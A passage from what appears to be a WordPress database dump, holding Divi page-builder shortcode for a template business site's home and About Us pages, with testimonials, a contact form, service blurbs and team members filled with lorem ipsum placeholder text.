Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"50px||50px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.4.9\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" fullwidth_field=\"on\" _builder_version=\"4.4.9\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-08-07 17:12:41','2020-08-07 17:12:41','',134,'https://wthtest1.in8.cdn-alpha.com/2020/08/07/134-revision-v1/',0,'revision','',0),(517,1,'2020-08-07 18:11:33','2020-08-07 18:11:33','[et_pb_section fb_built=\"1\" admin_label=\"Page Header\" _builder_version=\"3.22\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/circle-background-pattern.png\" custom_padding=\"67px|0px|67.1875px|0px|false|false\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"||||||||\" header_font=\"Montserrat|700||on|||||dotted\" header_text_color=\"#353740\" header_font_size=\"60px\" header_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|||\" animation_style=\"fade\" header_font_size_last_edited=\"off|desktop\" locked=\"off\"]<h1>About US</h1>\r[/et_pb_text][et_pb_divider show_divider=\"off\" disabled_on=\"on|on|off\" _builder_version=\"3.2\" max_width=\"120px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"30%\"][/et_pb_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"About Us Section\" _builder_version=\"3.22\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/business_01.jpg\" custom_margin=\"|5%||5%\" custom_margin_tablet=\"\" custom_margin_phone=\"|0px||0px\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%|||\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"5%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-200px\" box_shadow_color=\"#ffffff\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"About Us Area\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"27px|0px|0px|0px\"][et_pb_column type=\"2_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_color=\"#f7f7f7\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"10%|10%|10%|10%\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_vertical=\"15px\" box_shadow_blur=\"45px\" box_shadow_color=\"rgba(0,0,0,0.15)\" locked=\"off\"]<h2>Building the future</h2>\r\n<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis iste natus sit voluptatem accusantium doloremque laudantium totam rem aperiam, eaque ipsa quae ab.</p>\r\n<p>Illo inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. <span style=\"font-size: 16px;\">Nemo enim ipsam voluptatem quia voluptas sit aspernatur aut odit aut fugit, sed quia consequuntur magni dolores eos qui ratione voluptatem sequi nesciunt. Neque porro quisquam est, qui dolorem ipsum quia dolor sit amet, consectetur, adipisci velit, sed quia non numquam eius modi tempora incidunt ut labore et dolore magnam aliquam quaerat voluptatem.</span></p>\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Service Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Development\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Curabitur aliquam justo ex, ac varius sem facilisis a. In vel felis eros. Fusce ipsum enim.</span></p>\r[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Curabitur aliquam justo ex, ac varius sem facilisis a. In vel felis eros. Fusce ipsum enim.</span></p>\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Curabitur aliquam justo ex, ac varius sem facilisis a. In vel felis eros. Fusce ipsum enim.</span></p>\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Photography\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Curabitur aliquam justo ex, ac varius sem facilisis a. In vel felis eros. Fusce ipsum enim.</span></p>\r[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"110px|0px|110px|0px\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"4%\" animation_starting_opacity=\"100%\" locked=\"off\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_font=\"||||||||\" text_text_color=\"#353740\" text_font_size=\"24px\" text_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]<p><span>Curabitur aliquam justo ex, ac varius sem facilisis a. Fusce ipsum enim, <strong>ultrices at ante sollicitudin</strong>, faucibus hendrenunc. Nullam tempor nulla eu imperdiet interdum.</span></p>\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.5.2\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#d4b068\" background_color_gradient_end=\"#ffffff\" background_color_gradient_start_position=\"30%\" background_color_gradient_end_position=\"30%\" custom_padding=\"0px||110px|\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"0px|0px|0px|0px\" animation_direction=\"top\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=GQB6K7Dozms\" image_src=\"//i.ytimg.com/vi/GQB6K7Dozms/hqdefault.jpg\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Team Member Section\" _builder_version=\"3.22\" custom_padding=\"110px||60px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_text_color=\"#353740\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Fearless Leaeders</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||15px|\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Eduard Ungureanu\" position=\"Project Manager\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/travel-portrait-01.jpg\" facebook_url=\"#\" twitter_url=\"#\" google_url=\"#\" linkedin_url=\"#\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\"][/et_pb_team_member][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Christina Foster\" position=\"Creative Director\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/travel-portrait-06.jpg\" facebook_url=\"#\" twitter_url=\"#\" google_url=\"#\" linkedin_url=\"#\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" animation_delay=\"100ms\" locked=\"off\"][/et_pb_team_member][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Jason Wardak\" position=\"Visual Media\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/travel-portrait-04.jpg\" facebook_url=\"#\" twitter_url=\"#\" google_url=\"#\" linkedin_url=\"#\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" animation_delay=\"200ms\" locked=\"off\"][/et_pb_team_member][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Other Recent Works Section\" _builder_version=\"3.22\" background_color=\"#353740\" custom_margin=\"|||\" custom_padding=\"60px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#d4b068\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_color=\"#d4b068\" header_2_font=\"Montserrat|700||on|||||\" header_2_text_color=\"#d4b068\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>our Work</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#f7f7f7\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" admin_label=\"Other Recent Works Area\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-06.jpg\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-05.jpg\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_delay=\"100ms\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-02.jpg\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_delay=\"200ms\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" 